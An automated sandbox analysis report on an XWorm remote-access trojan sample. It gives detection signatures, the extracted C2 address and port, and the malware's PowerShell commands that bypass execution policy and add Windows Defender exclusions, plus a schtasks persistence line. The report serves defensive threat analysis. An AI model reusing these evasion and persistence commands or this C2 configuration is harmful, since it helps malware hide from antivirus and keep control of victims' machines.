Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fjijTlM2tu.exe

Overview

General Information

Sample name:fjijTlM2tu.exe
renamed because original name is a hash value
Original sample name:929395b5d0f521c2a6b556a341da65343177a3edcc88862938d5a8cef166e93c.exe
Analysis ID:1539518
MD5:55107da03a7ee49d56320d0b43945691
SHA1:e8c75f1a39fec81a99e3c65c45f965b669286d59
SHA256:929395b5d0f521c2a6b556a341da65343177a3edcc88862938d5a8cef166e93c
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fjijTlM2tu.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\fjijTlM2tu.exe" MD5: 55107DA03A7EE49D56320D0B43945691)
    • powershell.exe (PID: 4080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6556 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • localsys64.exe (PID: 6428 cmdline: C:\Users\user\AppData\Roaming\localsys64.exe MD5: 55107DA03A7EE49D56320D0B43945691)
  • localsys64.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Roaming\localsys64.exe" MD5: 55107DA03A7EE49D56320D0B43945691)
  • localsys64.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Roaming\localsys64.exe" MD5: 55107DA03A7EE49D56320D0B43945691)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["147.185.221.22"], "Port": "43768", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
fjijTlM2tu.exeJoeSecurity_XWormYara detected XWormJoe Security
    fjijTlM2tu.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x86ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x876b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8880:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x8346:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\localsys64.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\localsys64.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x86ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x876b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8880:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8346:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x84ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x856b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x8680:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x8146:$cnc4: POST / HTTP/1.1
        00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xa18e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xa22b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xa340:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x9e06:$cnc4: POST / HTTP/1.1
          Process Memory Space: fjijTlM2tu.exe PID: 6872JoeSecurity_XWormYara detected XWormJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x86ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x876b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8880:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x8346:$cnc4: POST / HTTP/1.1
              0.2.fjijTlM2tu.exe.12c69ac0.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.2.fjijTlM2tu.exe.12c69ac0.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x68ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x696b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x6a80:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x6546:$cnc4: POST / HTTP/1.1
                0.0.fjijTlM2tu.exe.710000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', ProcessId: 4080, ProcessName: powershell.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', ProcessId: 4080, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\localsys64.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fjijTlM2tu.exe, ProcessId: 6872, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\localsys64
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', ProcessId: 4080, ProcessName: powershell.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\fjijTlM2tu.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\localsys64.lnk
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe", ProcessId: 6556, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', ProcessId: 4080, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-22T19:31:00.614747+020028559241Malware Command and Control Activity Detected192.168.2.450013147.185.221.2243768TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: fjijTlM2tu.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeAvira: detection malicious, Label: TR/Spy.Gen
                  Found malware configuration
                  Source: fjijTlM2tu.exeMalware Configuration Extractor: Xworm {"C2 url": ["147.185.221.22"], "Port": "43768", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeReversingLabs: Detection: 78%
                  Multi AV Scanner detection for submitted file
                  Source: fjijTlM2tu.exeReversingLabs: Detection: 78%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: fjijTlM2tu.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: fjijTlM2tu.exeString decryptor: 147.185.221.22
                  Source: fjijTlM2tu.exeString decryptor: 43768
                  Source: fjijTlM2tu.exeString decryptor: <123456789>
                  Source: fjijTlM2tu.exeString decryptor: <Xwormmm>
                  Source: fjijTlM2tu.exeString decryptor: sigma
                  Source: fjijTlM2tu.exeString decryptor: USB.exe
                  Source: fjijTlM2tu.exeString decryptor: %AppData%
                  Source: fjijTlM2tu.exeString decryptor: localsys64.exe
                  Source: fjijTlM2tu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: fjijTlM2tu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:50013 -> 147.185.221.22:43768
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 147.185.221.22
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 147.185.221.22 ports 43768,3,4,6,7,8
                  Source: global trafficTCP traffic: 192.168.2.4:49759 -> 147.185.221.22:43768
                  Source: Joe Sandbox ViewIP Address: 147.185.221.22 147.185.221.22
                  Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.22
                  Source: powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222011806.00000206296AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                  Source: powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222011806.00000206296AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                  Source: powershell.exe, 00000001.00000002.1750379814.000002AFA5FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1843905928.000001FCB52D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1992420947.0000020590071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000001.00000002.1729265140.000002AF96159000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.000002058022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1729265140.000002AF95F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.0000020611291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000001.00000002.1729265140.000002AF96159000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.000002058022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                  Source: powershell.exe, 00000001.00000002.1729265140.000002AF95F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.0000020611291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000001.00000002.1750379814.000002AFA5FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1843905928.000001FCB52D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1992420947.0000020590071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: fjijTlM2tu.exe, XLogger.cs.Net Code: KeyboardLayout
                  Source: localsys64.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: fjijTlM2tu.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.0.fjijTlM2tu.exe.710000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
